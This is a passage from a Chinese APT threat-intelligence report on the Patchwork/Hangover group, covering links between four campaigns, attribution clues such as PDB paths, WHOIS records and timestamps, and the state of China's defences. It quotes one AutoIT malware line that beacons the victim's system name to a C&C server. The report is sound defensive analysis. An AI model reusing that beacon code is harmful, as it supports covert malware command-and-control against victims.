另外我们可以看到Kumar样本请求的URL中的目录名称和Hangover样本PDB路径中的用户名相同。相关部分PDB路径如下表所示:

9.png

Hangover相关样本PDB路径

2. 第一次和第二次攻击行动

10.png

相关样本基本信息

从上表是第一次和第二次攻击行动相关样本的基本信息,从编译时间、C&C,以及URL形态暂时看不出有较强的关联。

11.png

两者之间相同信息

上表是两次攻击行动中样本的相同信息,其中User-Agent都是“WinInetGet/0.1”,进一步两者都属于downloader,作用为通过HTTP连接C&C,下载payload并执行,然后将执行结果通过res参数上报C&C,成功为sucessfully(拼写错误),失败为failed。下表示两者之间网络函数的差别。

两者之间网络函数的区别

3. 第一次和第三次攻击行动

共用C&C

第一次和第三次攻击行动中的后门程序都使用了相同的C&C服务器,如下:

13.png

共用的C&C列表

相似的通信控制

第三次攻击行动中也有部分AutoIT恶意程序,AutoIT恶意程序请求的HTTP是“http://server/folder/online.php?sysname=”,这个格式(dfiles5 = urlopen(“http://”+ getserver + foldername+ “/online.php?sysname=”+cname+”"))在Hangover攻击案例中的被多次用到,所以说两者的网络构建是关联的,进一步用于控制恶意程序的后端构架也是一样的。

4. 第一次和第四次攻击行动

相同的邮箱地址

14.png

第四次攻击行动相关C&C信息(SOA信息)

对照上表和下表的内容,我们可以看到第四次攻击中C&C SOA的管理者邮箱地址与第一次攻击中C&C的域名注册邮箱一致,都是“*********24@gmail.com”,上表中所有C&C从注册第二天开始就采用whois隐私保护,从下表我们也能推测出攻击者基本是在2012年注意到域名注册邮箱会暴露相关信息,而统一更换为whois隐私保护策略,但由于有相关历史WHOIS记录,所以我们还是发现了相关蛛丝马迹。

但由于SOA的内容是可以由DNS管理者自行修改,所以也不排除攻击组织刻意修改为虚假邮箱地址等信息来达到混淆视听的目的。

15.png

第一次攻击行动相关C&C信息(WHOIS信息)

C&C指向同一IP

16.png

十、 幕后组织

1. 归属分析

PDB路径

第一次攻击行动

Hangover中OSX.Kumar.A样本请求的URL是“hxxp://******one.net/yash/upload.php”,其中“yash”在针对windows平台的其他样本中的PDB中也出现过。

17.png

Hangover相关样本PDB路径

第四次攻击行动

18.png

基础信息

Kanishk是来自北印度语单词,意味着“守护之神毗湿奴的媒介”,一般作为男孩的名字,相关示例如下表(名+姓)。

19.png

相关姓名示例

另外Kanishk类似Kaniska,Kanishka。

20.png

Kaniska维基百科

21.png

相关基础信息

OSX.Kumar开发者信息

可以看到OSX.kumar家族中的苹果开发者信息是名为:Rajinder Kuma

22.png

OSX.Kumar.B开发者相关信息

恶意代码时间戳

通过第一次和第四次攻击行动中样本时间戳统计来看,首先相关结果基本接近。

我们假设攻击者是职业组织,即与一般政府、工商等上班时间类似,则相关工作时间趋向于UTC+5 时区。

23.png

第一次攻击行动

24.png

第四次攻击行动

域名注册信息

其中以*********ine.org为例,分析相关WHOIS信息。

25.png

域名注册相关信息

2. 组织描述


组织描述表

十一、 总结

在追日团队持续跟踪监控摩诃草组织,通过对该组织相关TTPs的研究分析,以及结合以往跟进或披露的APT组织或攻击行动,我们认为以下几点是值得大家关注的:

1. APT攻击从未停歇

从2013年Norman安全公司将摩诃草组织(即HangOver)曝光后,该组织并未因此停止相关攻击活动,尤其从2015年至2016年期间,相关攻击活动愈演愈烈。对摩诃草组织这四次攻击行动的分析,我们发现其攻击意图中主要的攻击目标和目的也都未发生改变,这也体现出幕后组织意志的坚定性和达到目标的决心。

另外,在跟进的APT组织或行动中,很多组织都不会因为一次攻击行动的暴露或失败而导致该组织停止活动或放弃目标,由于相关恶意代码、C&C等暴露的确会给相关组织带来一定影响,如暂时的蛰伏,而一旦该组织在重新配备资源,调整好相关战术和技术后,就会立即发动新的攻击。比如我们之前披露的海莲花组织(APT-C-00),在我们披露后该组织有很短一段时间没有活跃,但很快又恢复了“生机”,相关攻击活动至今还很活跃。

我们认为这种从未停歇的攻击体现出APT本身的特性,从一定角度很好的解释了APT里P(Persistent,持续性)的涵义。针对持续的威胁,没有一劳永逸的解决方法,与之能抗衡的就是需要我们从未停歇的对抗,持续的跟踪监控。

2. APT攻击“不计成本”

虽然暂时没有直接的证据证实摩诃草组织是一个由国家支持的APT组织,但攻击过程中所使用的大量资源,都表明这不是一个人或一般组织能承受的攻击成本,除非幕后有一个强大的财团支持,另外,该组织相关攻击所表达出明确的意图和坚定的意志,这也不是个体所能达到的,结合这些客观现象,我们认为摩诃草更有可能是由一个国家背景长期支持的APT组织。

APT组织是否会对一个目标发动攻击,主要取决于目标的价值,而不在于目标本身的强弱程度。目标本身防御的强弱只是决定了发动相应攻击所动用的资源,如是否采用0day漏洞,或使用一般钓鱼网站攻击即可达到效果,摩诃草组织很好的诠释了这一点APT特性,在资源使用方面,摩诃草组织基本是对目标所存在的所有受影响攻击面都会涉及考虑到,采用各种方式,从各个角度进行攻击。几乎是一种为达到目的,不择手段,不计成本的攻击方式。

相关攻击行动中使用了大量漏洞,其中至少包括一次0day漏洞使用,相关恶意代码非常繁杂。目前恶意代码HASH数量有995个,C&C数量为731个,而且相关恶意代码会持续的迭代更新。载荷投递的方式,主要是以鱼叉邮件进行恶意代码的传播,另外会涉及少量水坑攻击,在最近一次攻击行动中基于即时通讯工具和社交网络也是主要的恶意代码投递途径。尤其是该组织选择了基于即时通讯工具这种高成本的攻击。除了基于恶意代码攻击,还会采用钓鱼网站,用一种纯粹社会工程学的攻击方法来达到目的。该组织主要除了针对Windows系统进行攻击,同时也会针对Mac OS X系统进行攻击,不仅如此,随着智能移动终端的普及,针对Android的攻击也随之产生。

3. 中国是APT主要受害国

在今年我们发布的《2015年中国高级持续性威胁(APT)研究报告》 中已经明确指出了中国是APT攻击的主要受害国,报告中“截至2015年11月底,360威胁情报中心监测到的针对中国境内科研教育、政府机构等组织单位发动APT攻击的境内外黑客组织累计29个”,摩诃草组织就是这29个组织的其中之一。

摩诃草组织的主要攻击目标是中国,进一步主要针对中国科研教育和政府机构,其主要目的是窃取敏感数据情报。摩诃草组织也代表了以中国为攻击目标的APT组织一般所具有的特性:关注科研教育、政府机构,以窃取数据为目的。

在分析摩诃草组织过程中,我们发现在针对中国的攻击,从2015年第三方和第四次攻击行动中,针对中国的目标行业除了科研教育外,针对军事领域的相关攻击不断增加,尤其是关于南海争端等。也就是APT组织会紧密围绕政治、经济、科技、军工等热点领域及事件发动相关攻击。类似“一带一路”、“军民融合”等是除了摩诃草组织以外,也是如海莲花组织、APT-C-05、APT-C-12、APT-C-17等这些组织重点关注的领域。

4. 国内能力型厂商依然缺位

摩诃草组织从2009年一直活跃至今,尤其在2016相关攻击更为活跃,另外海莲花组织、APT-C-05、APT-C-06、APT-C-12等我们监控到的大部分APT组织都是类似,相关攻击从未停歇而且每次攻击行动都不会空手而归。在《2015年中国高级持续性威胁(APT)研究报告》中指出针对中国的攻击,往往低成本的攻击就能达到攻击者的预期,而导致低成本入侵频频得手的主要原因还是由于相关被攻击目标防御薄弱。这是造成摩诃草组织在曝光披露后依然活跃的原因之一,但更主要的原因是检测欠缺和响应乏力,我们在本节之后的内容中会详细阐述。

针对每一次攻击,无论是安全机构还是被攻击目标都基本需要经过这几个步骤:监控发现、分析披露、通报告警、检测防御。从摩诃草、海莲花组织的相关攻击中,我们可以看到中国的大部分安全机构或被攻击目标单位相关环节和防护措施还是存在很多问题。

首先,在国内只有很少几家安全厂商能实现自主发现APT攻击,一般机构都是在国外安全厂商披露后进行跟进分析,比如摩诃草最早是由Norman安全公司披露。这一现象不单单在APT攻击事件,如其他重大安全事件和漏洞,都是类似。国内安全厂商基本基于国外披露的信息进行报告、预警提交给有关单位或部门,然后就已经“完成”了一次事件响应,关于后续的检测防御,基本就是基于公开的IOC来进行,然而被攻击目标单位也基本“认同”这一处置方式。

我们所说的能力型安全厂商,不仅需要完成上述跟踪国外厂商报告的能力,更重要的是依赖自身数据或客户数据对APT攻击进行独立发现、溯源与监测,进而对这些攻击进行披露,同时还能针对这些APT攻击为各类受害用户提供日常的检测与响应。

国内虽然号称能够检测APT的产品很多,但是真正能够发现、分析、溯源和防护高级威胁的安全产品依然很少,这和国内缺乏能力型安全厂商生存的空间有很大的关系。从过去360威胁情报中心或安天实验室等能力型厂商已披露的APT组织或行动的监控来看,相关攻击在披露后,至今在各重要政府机构依然非常活跃,攻击中虽然新增了一些木马变种,但不可思议的是已知木马或C&C还很活跃。这很像是医生与患者之间的关系,专业医院告知患者伤口未愈,患者表示知晓,但服务于患者的家庭医生并未给予患者缝合治愈,甚至部分患者也未对未愈的伤口表示重视,最后的结果就是患者继续带伤前行,直至遍体鳞伤无力倒地。这种现象确实和国内安全能力型厂商缺乏其生存的空间有很大的关系。

与上述医患关系一样,我们都不希望看到这种结果。如果在现在的防护体系中,能够引入更多能力型厂商,更多能从监控发现到检测防御每个环节打通完善,形成良性的闭合循环,各类安全厂商与被攻击目标之间形成协同联动,即使我们无法提前知晓摩诃草组织何时卷土重来,也无法阻止摩诃草组织发起下一次攻击行动,但我们依然可以将后续的相关攻击拒之门外,让摩诃草的第五次攻击行动化为泡影。

5. 网络安全和信息化协同发展

习总书记在2014年2月27日下午主持召开中央网络安全和信息化领导小组第一次会议并发表重要讲话,其中强调:“网络安全和信息化是一体之两翼、驱动之双轮,必须统一谋划、统一部署、统一推进、统一实施。做好网络安全和信息化工作,要处理好安全和发展的关系,做到协调一致、齐头并进,以安全保发展、以发展促安全,努力建久安之势、成长治之业。”

从摩诃草、海莲花等的相关攻击行动中,我们除了可以看出被攻击目标本身防御薄弱以外,也暴露出相关信息化建设的不完善。在摩诃草组织的攻击中我们发现有大量攻击是通过第三方个人版本的即时通讯工具和社交网络为起初攻击入口来实施攻击,进一步攻击者所投放的钓鱼网站也是假冒的第三方个人免费邮箱,这也从侧面反映被攻击目标可能以个人免费邮箱作为常用联系工具。最后大多数APT组织在针对中国地区的鱼叉邮件攻击中,被攻击目标所接收邮件的邮箱往往是第三方个人免费邮箱,另外攻击者也习惯采用同类第三方免费邮箱进行载荷投递。

从《2015年中国高级持续性威胁(APT)研究报告》中,我们可以了解到被攻击目标主要是集中在科研教育和政府机构等领域。这两类敏感重点行业领域更需要在建设初期就进行安全规划,特别是与互联网相关的个人和机构,避免将个人与工作的信息混杂,让攻击者找到潜在隐患的入口,最终导致机构被攻击渗透。2016年4月19日,习近平总书记在网络安全和信息化工作座谈会上强调:“网络安全是整体的而不是割裂的”,进一步在对APT等高级威胁的对抗过程中,除了加强网络安全环节的建设,也需要与信息化建设统一谋划、统一部署、统一推进和统一实施。

【声明】:8090安全小组门户(http://www.8090-sec.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们:邮箱hack@ddos.kim,我们会在最短的时间内进行处理。